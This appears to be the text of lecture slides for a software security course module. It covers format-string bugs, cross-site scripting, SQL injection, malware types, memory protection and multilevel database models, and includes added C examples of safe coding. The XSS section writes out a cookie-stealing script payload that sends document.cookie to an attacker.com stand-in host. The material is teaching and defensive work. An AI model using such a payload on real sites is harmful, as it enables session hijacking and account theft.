SECURITY
MODULE 2
SOFTWARE SECURITY
SPR
Buffer Overflow
Format String Vulnerability
Format String Vulnerability: example
Safe Code
The line printf("%s", argv[1]); in the example is safe. If you compile the program and run it:
./example "Hello World %s%s%s%s%s%s"
the printf in the first line will not interpret the "%s%s%s%s%s%s" in the input string, because the input is passed as an argument rather than as the format string, and the output will be: "Hello World %s%s%s%s%s%s"
Format String Vulnerability: example
Vulnerable Code
The line printf(argv[1]); in the example is vulnerable. If you compile the program and run it:
./example "Hello World %s%s%s%s%s%s"
the printf in the second line will interpret the %s%s%s%s%s%s in the input string as conversion directives, because the input is now the format string itself. It will try to interpret every %s as a pointer to a string, reading successive values starting from the location of the buffer (probably on the stack). At some point it will reach an invalid address, and attempting to access it will crash the program.
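The two printf patterns contrasted above, as an added C example that is not the program from the slides. The input string is a constructed copy of the slide's command-line argument; it is only ever passed as an argument to a literal format, and the count_directives helper is an audit check (an assumption of this example, not a standard library function) that reports how many directives such a string would trigger if it were used as the format:

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Added example; not the program from the slides. The input below is a
 * constructed copy of the slide's command-line argument, and it is never
 * used as a format string here: the point is to show that with a literal
 * format the directives in the input stay inert. */

/* Safe pattern from the slide: literal format, untrusted text as data.
 * Returns the number of characters that would be written (snprintf). */
static int render_safe(char *out, size_t out_len, const char *untrusted)
{
    return snprintf(out, out_len, "%s", untrusted);
}

/* Returns 1 when the safe rendering reproduces the input byte for byte,
 * i.e. no %s was consumed as a directive; 0 otherwise. */
static int safe_roundtrip(const char *untrusted)
{
    char buf[256];
    int n = render_safe(buf, sizeof buf, untrusted);
    return n >= 0 && (size_t)n < sizeof buf && strcmp(buf, untrusted) == 0;
}

/* Audit helper (hypothetical, not a libc function): count the conversion
 * directives printf would act on if this string were wrongly passed as the
 * format argument. "%%" is a literal percent sign and does not count. A
 * non-zero result for text that reaches printf(str) is the bug described
 * on the slide. */
static int count_directives(const char *s)
{
    int n = 0;
    for (const char *p = s; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {   /* escaped percent: skip the pair */
            p++;
            continue;
        }
        n++;                 /* %s, %x, %n, ... each read an argument */
    }
    return n;
}

int main(void)
{
    /* Constructed input mirroring ./example "Hello World %s%s%s%s%s%s" */
    const char *input = "Hello World %s%s%s%s%s%s";
    char buf[256];

    render_safe(buf, sizeof buf, input);
    printf("safe output      : %s\n", buf);
    printf("directives found : %d\n", count_directives(input));
    return 0;
}
```

Compiling with gcc's -Wformat -Wformat-security flags the printf(argv[1]) form from the slide at build time; the roundtrip check above is the runtime counterpart, showing the six %s directives passing through untouched.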
Buffer overflow vs. format string
Cross-site scripting (XSS)
How does XSS work?
Reflected XSS
Cross-site scripting (XSS) is a web application vulnerability that permits an attacker to inject code (typically HTML or JavaScript) into the contents of a website they do not control. When a victim views an infected page on that website, the injected code executes in the victim's browser.
Stored XSS
DOM-based XSS
2. GET
http://website.com/search?keyword=<script>window.location='http://attacker.com/?cookie='+document.cookie</script>
3. The website returns a response whose HTML body does not contain the search string
<html>
<h1> You Searched for:</h1>
<div id="searchquery"> </div>
<script>
<!-- 9 = length of "?keyword=" -->
var keyword = location.search.substring(9);
document.querySelector('#searchquery').innerHTML = keyword;
</script>
</html>
Example of DOM-based cross-site scripting
4. The HTML added is the malicious code that steals the user's cookie
<html>
<h1> You Searched for:</h1>
<div id="searchquery"><script>window.location='http://attacker.com/?cookie='+document.cookie</script> </div>
<script>
<!-- 9 = length of "?keyword=" -->
var keyword = location.search.substring(9);
document.querySelector('#searchquery').innerHTML = keyword;
</script>
</html>
5. The browser executes the new code and sends a GET request to the attacker's server with the user's cookie.
GET "http://attacker.com/?cookie=user-cookie"
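The sink in steps 3 and 4 is the keyword being written into the page as markup; the fix is to treat it as text. On the client that means assigning element.textContent instead of innerHTML; when the server builds the page, it means HTML-encoding the value first. The following is an added C example, not code from the slides: it parses the query string the way the slide's script should, then renders the searchquery div both as the innerHTML sink does (markup passes through) and with encoding applied. The query_param, html_encode and render_search_result functions and the SAMPLE_QUERY payload are all constructed for this example:

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Added example, not from the slides. Constructed stand-in for the
 * slide's step-2 query string (a harmless script instead of the cookie one). */
#define SAMPLE_QUERY "?keyword=<script>alert(1)</script>"

/* Copy the value of query parameter `name` from `search` ("?a=1&b=2") into
 * `out`. Returns 1 if found, 0 otherwise. No URL decoding is performed,
 * matching the raw payload shown on the slide. */
static int query_param(const char *search, const char *name,
                       char *out, size_t out_len)
{
    size_t nlen = strlen(name);
    const char *p = (*search == '?') ? search + 1 : search;

    while (*p != '\0') {
        if (strncmp(p, name, nlen) == 0 && p[nlen] == '=') {
            const char *v = p + nlen + 1;
            size_t vlen = strcspn(v, "&");
            if (vlen + 1 > out_len)
                return 0;           /* value too long for caller's buffer */
            memcpy(out, v, vlen);
            out[vlen] = '\0';
            return 1;
        }
        p += strcspn(p, "&");       /* skip this name=value pair */
        if (*p == '&')
            p++;
    }
    return 0;
}

/* HTML-encode `in` into `out`. Returns 0 on success, -1 if `out` is too
 * small. The five characters below are the ones that can change the
 * meaning of HTML text or attribute content. */
static int html_encode(const char *in, char *out, size_t out_len)
{
    size_t used = 0;
    if (out_len == 0)
        return -1;
    for (; *in != '\0'; in++) {
        char one[2] = { *in, '\0' };
        const char *rep = one;
        switch (*in) {
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '&':  rep = "&amp;";  break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        size_t len = strlen(rep);
        if (used + len + 1 > out_len)
            return -1;
        memcpy(out + used, rep, len);
        used += len;
    }
    out[used] = '\0';
    return 0;
}

/* Build the <div> from steps 3/4. encode=0 reproduces the innerHTML sink
 * (markup from the query lands in the page); encode=1 is the fix.
 * Returns a pointer to a static buffer, like strerror(). */
static const char *render_search_result(const char *search, int encode)
{
    static char page[2048];
    char keyword[256], safe[1536];
    const char *shown = "";

    if (query_param(search, "keyword", keyword, sizeof keyword)) {
        if (!encode)
            shown = keyword;
        else if (html_encode(keyword, safe, sizeof safe) == 0)
            shown = safe;       /* on encode failure nothing is shown */
    }
    snprintf(page, sizeof page, "<div id=\"searchquery\">%s</div>", shown);
    return page;
}

int main(void)
{
    printf("innerHTML sink : %s\n", render_search_result(SAMPLE_QUERY, 0));
    printf("encoded (fix)  : %s\n", render_search_result(SAMPLE_QUERY, 1));
    return 0;
}
```

The unencoded rendering still contains a script element; the encoded one contains only &lt;script&gt; text, which the browser displays rather than parses.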
SQL injection attack (SQLi)
How does SQLi work?
Notable SQL Injection Vulnerabilities
Tesla vulnerability
Cisco vulnerability
Fortnite vulnerability
How to prevent SQL Injection attacks
Malware
MALWARE classification (diagram): Traditional, Autonomous, Remote Controlled, Trojan Horse
Virus
Self-replicating code
Alters normal code with “infected” version
Viruses
1. Boot Sector Virus – This type of virus infects the master boot record. It is challenging and complex to remove, and often requires the system to be formatted. It mostly spreads through removable media.
2. Direct Action Virus – This is also called a non-resident virus; it gets installed or stays hidden in the computer memory. It stays attached to the specific type of files that it infects. It does not affect the user experience or the system's performance.
3. Resident Virus – Unlike direct action viruses, resident viruses get installed on the computer. It is difficult to identify such a virus, and even more difficult to remove it.
4. Multipartite Virus – This type of virus spreads in multiple ways. It infects both the boot sector and executable files at the same time.
5. Polymorphic Virus – These viruses are difficult to identify with a traditional anti-virus program, because a polymorphic virus alters its signature pattern whenever it replicates.
6. Overwrite Virus – This type of virus deletes all the files that it infects. The only way to remove it is to delete the infected files, and the end user loses all their contents. Identifying an overwrite virus is difficult as it spreads through emails.
7. Spacefiller Virus – This is also called a "Cavity Virus". It is called so because it fills up the empty spaces between the code and hence does not cause any damage to the file.
Worms (diagram): self-replicating; spread over the network; spread without user interaction
Worm
More recent worm attacks
Code Red
July 2001, exploiting an MS IIS bug
probes random IP addresses, performs a DDoS attack
consumes significant network capacity when active
infected 360,000 servers in 14 hours
Trojan horse
Common types of Trojan malware:
Backdoor Trojan
Distributed Denial of Service (DDoS) attack Trojan
Downloader Trojan
Game-thief Trojan
Mail finder Trojan
Fake AV Trojan
Ransom Trojan
Remote Access Trojan
Rootkit Trojan
SMS Trojan
Trojan banker
Trojan IM
Trojan Horse Malware Examples
How to Detect Trojans in Your Organization
Logic bombs
User-level rootkits
Kernel-level rootkits
Bootkits
Firmware rootkits
Rootkit hypervisors
Bots
Fence (diagram): the operating system occupies addresses 0 to n; the user program space occupies addresses n+1 up to the high end of memory. The fence is a hardware address limitation, set either as 1. a fixed address or 2. a hardware register (fence register).
Fence Register
However, the operating system can change in size from version to version, and it would be extremely difficult and time-consuming to update the address location manually.
By adding a relocation factor to each address in the program, the system can update the addresses automatically as needed.
Relocation
Base/Bounds Registers
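The fence, the relocation factor and the base/bounds pair described on the slides above, modelled in software as an added C example (not from the slides). The fence value, the DATA_SEG placement and every address are constructed; ACCESS_FAULT is this example's own sentinel for "the hardware traps to the OS":

```c
#include <stdint.h>
#include <stdio.h>

/* Added example, not from the slides. Models the three memory protection
 * mechanisms the slides describe: a fence, relocation through a base
 * register, and a bounds register. All addresses are constructed. */

#define ACCESS_FAULT UINT64_MAX   /* sentinel: access denied, trap to OS */

/* 1. Fence: addresses 0..fence belong to the operating system; a user
 * program may only touch addresses above the fence. */
static uint64_t fence_check(uint64_t addr, uint64_t fence)
{
    return addr > fence ? addr : ACCESS_FAULT;
}

/* 2. Relocation: the program is written as if it started at address 0;
 * the hardware adds the relocation factor (base register) to every
 * address, so a bigger OS only changes the base, never the program. */
static uint64_t relocate(uint64_t logical, uint64_t base)
{
    return base + logical;
}

/* 3. Base/bounds: the bounds register caps how far above the base the
 * program may reach, so it cannot wander into another program's space. */
typedef struct {
    uint64_t base;    /* relocation factor */
    uint64_t bounds;  /* size of the region in bytes */
} segment_t;

/* Constructed placement of one segment, named after the slide's DATA_SEG:
 * physically at 8192, 1024 bytes long. */
static const segment_t DATA_SEG = { 8192, 1024 };

static uint64_t translate(const segment_t *seg, uint64_t logical)
{
    if (logical >= seg->bounds)
        return ACCESS_FAULT;          /* out of bounds */
    return relocate(logical, seg->base);
}

static void report(const char *what, uint64_t result)
{
    if (result == ACCESS_FAULT)
        printf("%-28s -> FAULT\n", what);
    else
        printf("%-28s -> %llu\n", what, (unsigned long long)result);
}

int main(void)
{
    const uint64_t fence = 4095;      /* constructed: OS occupies 0..4095 */
    report("fence: user reads 5000", fence_check(5000, fence));
    report("fence: user reads 100", fence_check(100, fence));
    report("relocate 16 with base 4096", relocate(16, 4096));
    report("DATA_SEG[1023]", translate(&DATA_SEG, 1023));
    report("DATA_SEG[1024]", translate(&DATA_SEG, 1024));
    return 0;
}
```

The last two calls show the bounds check doing the work the fence alone cannot: the address 8192 + 1024 is a valid memory address, but it lies outside this program's segment, so the access is refused before relocation happens.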
Segmentation (diagram): the logical arrangement of the program (Main, SUB, DATA_SEG) versus the physical placement of its segments in memory (Main, SEG_A, SUB, DATA_SEG).
File Protection Mechanism
1. FAT32
2. NTFS
FAT 32 and NTFS structure
NTFS partition
File Protection Mechanism
USER AUTHENTICATION
LINUX vs WINDOWS
Database Security
1. Database Security Requirements
2. Reliability and Integrity
3. Sensitive Data
4. Inference Attacks
Database Security Requirements
1. Physical Database Integrity
2. Logical Database Integrity
3. Element Integrity
4. Auditability
5. Access Control
6. User Authentication
7. Availability
Database Security Requirements
Physical Database Integrity:
The data of the database are immune to physical problems, such as power failures, and someone can reconstruct the database if it is destroyed by a catastrophe.
Physically securing storage media
Regular backups
Database Security Requirements
Element Integrity:
The data contained in each element are accurate.
Field check
Allows only acceptable values.
Access control
Allows only authorized users to update an element.
Collection and control of data at one central source.
Change log
Lists every change made to the database (original + modified values).
Obtain the original eligibility value from the log and correct the database.
Auditability:
It is possible to track who or what has accessed or modified elements in the database.
Log reads and writes in the database.
1. Database Security Requirements
Access Control:
A user is allowed to access only authorized data, and different users can be restricted to different modes of access.
Logical separation by user access privileges (view, relation, field, record / at element level)
Modes of access
User Authentication:
Every user is positively identified – both for the audit trail and for permission to access certain data.
Separate from the OS and rigorous.
Availability:
Users can access the database in general and the data for which they are authorized.
The right data to the right user at the right time.
2. Reliability and Integrity (diagram): applies to the database as a whole, to specific relations, or to element values; achieved through authentication, proper access control, accuracy (preventing the insertion of improper values), and auditing.
3. Sensitive Data
4. Inference Attack
An Inference Attack is a data mining technique performed by analysing data in order to illegitimately gain knowledge about a subject or database.
4. Inference Attack: example
There are two ways of dealing with the threat of disclosure by inference.
Multilevel Database Security
Polyinstantiation: Types
Entity polyinstantiation:
occurs when a relation contains more than one tuple with the same primary key values, but with different access class values for the primary key.
Attribute polyinstantiation:
occurs when a relation contains two or more tuples with identical primary key and primary key security level values, but with different values for one or more of the remaining attributes.
Sea View model
In the Sea View model, data are stored in a set of single-level fragments, and the multilevel relations are implemented as views over these single-level relations.
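The two polyinstantiation types defined above, and the view-over-single-level-fragments idea of the Sea View model, as an added C example that is not from the slides. The relation, its ship_id key, the cargo attribute and the two classification levels are all constructed, and the view logic is a simplification of Sea View (a tuple is visible at a clearance when both its key class and its attribute class are dominated by that clearance):

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Added example, not from the slides. A multilevel relation with security
 * labels, the two kinds of polyinstantiation defined above, and the view a
 * user of a given clearance gets (single-level fragments plus a view, the
 * Sea View idea, simplified). All tuples are constructed. */

enum level { UNCLASSIFIED = 0, SECRET = 1 };

typedef struct {
    int        ship_id;      /* apparent primary key */
    enum level key_level;    /* access class of the primary key */
    char       cargo[16];    /* one non-key attribute */
    enum level cargo_level;  /* access class of that attribute */
} tuple_t;

/* ship_id 1 appears with two different key classes: entity polyinstantiation.
 * ship_id 2 appears at one key class but with two cargo values at different
 * classes: attribute polyinstantiation. */
static const tuple_t RELATION[] = {
    { 1, UNCLASSIFIED, "grain",    UNCLASSIFIED },
    { 1, SECRET,       "missiles", SECRET       },
    { 2, UNCLASSIFIED, "fruit",    UNCLASSIFIED },
    { 2, UNCLASSIFIED, "arms",     SECRET       },
};
#define RELATION_LEN (sizeof RELATION / sizeof RELATION[0])

/* Same key, different key classes (definition of entity polyinstantiation). */
static int entity_polyinstantiated(int ship_id)
{
    for (size_t i = 0; i < RELATION_LEN; i++)
        for (size_t j = i + 1; j < RELATION_LEN; j++)
            if (RELATION[i].ship_id == ship_id && RELATION[j].ship_id == ship_id &&
                RELATION[i].key_level != RELATION[j].key_level)
                return 1;
    return 0;
}

/* Same key and key class, different value for a remaining attribute
 * (definition of attribute polyinstantiation). */
static int attribute_polyinstantiated(int ship_id)
{
    for (size_t i = 0; i < RELATION_LEN; i++)
        for (size_t j = i + 1; j < RELATION_LEN; j++)
            if (RELATION[i].ship_id == ship_id && RELATION[j].ship_id == ship_id &&
                RELATION[i].key_level == RELATION[j].key_level &&
                strcmp(RELATION[i].cargo, RELATION[j].cargo) != 0)
                return 1;
    return 0;
}

/* View at clearance `clr`: the union of the single-level fragments whose
 * class is dominated by clr. Returns the number of visible tuples; pointers
 * to them are stored in `out` (up to `cap`; `out` may be NULL to count only). */
static int view_at(enum level clr, const tuple_t *out[], int cap)
{
    int n = 0;
    for (size_t i = 0; i < RELATION_LEN; i++) {
        if (RELATION[i].key_level > clr || RELATION[i].cargo_level > clr)
            continue;                         /* not dominated: hidden */
        if (out != NULL && n < cap)
            out[n] = &RELATION[i];
        n++;
    }
    return n;
}

int main(void)
{
    const tuple_t *seen[RELATION_LEN];
    const enum level clearances[] = { UNCLASSIFIED, SECRET };

    for (size_t c = 0; c < 2; c++) {
        int n = view_at(clearances[c], seen, (int)RELATION_LEN);
        printf("clearance %d sees %d tuple(s):\n", (int)clearances[c], n);
        for (int i = 0; i < n; i++)
            printf("  ship %d cargo %s\n", seen[i]->ship_id, seen[i]->cargo);
    }
    printf("ship 1 entity-polyinstantiated:    %d\n", entity_polyinstantiated(1));
    printf("ship 2 attribute-polyinstantiated: %d\n", attribute_polyinstantiated(2));
    return 0;
}
```

An UNCLASSIFIED user sees one ship 1 and one ship 2, each with an innocuous cargo, and has no way to tell that a SECRET version of either exists; that is the cover story polyinstantiation is meant to provide, and the reason a multilevel relation cannot enforce a single-valued primary key across levels.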
Sea View model
Repeated joins
Spurious tuples
Incompleteness
Left outer joins
Jajodia-Sandhu Model
For example, the relation in Table 8 will be decomposed into two single-level fragments, as shown in Table 9.
Jajodia-Sandhu Model: limitations
Semantic ambiguity
Operational incompleteness
Smith-Winslett Model